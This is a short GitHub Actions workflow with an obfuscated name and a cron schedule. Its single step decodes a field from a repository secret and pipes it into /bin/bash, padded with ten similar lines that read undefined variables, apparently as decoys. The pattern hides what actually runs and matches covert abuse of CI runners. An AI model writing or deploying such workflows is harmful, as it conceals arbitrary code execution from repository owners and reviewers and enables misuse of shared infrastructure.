name: civilianattracted
on:
  workflow_dispatch:
  schedule:
    - cron: '15 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: civilianattracted
        env:
          jn63: ${{ secrets.jn63 }}
        run: |
          echo $jn63 | jq -r .vqdhv2 | /bin/bash
          echo $qf9947 | jq -r .p9 | /bin/bash
          echo $gqzek6572 | jq -r .tnt4 | /bin/bash
          echo $f74072 | jq -r .ld3 | /bin/bash
          echo $c94 | jq -r .lvzj277 | /bin/bash
          echo $chsy1 | jq -r .sif8702 | /bin/bash
          echo $vuzdh54 | jq -r .ffibq19947 | /bin/bash
          echo $iqo273 | jq -r .v69 | /bin/bash
          echo $lgvpg2 | jq -r .u40819 | /bin/bash
          echo $hjlo05 | jq -r .q45158 | /bin/bash
          echo $rz5 | jq -r .hkhck97 | /bin/bash

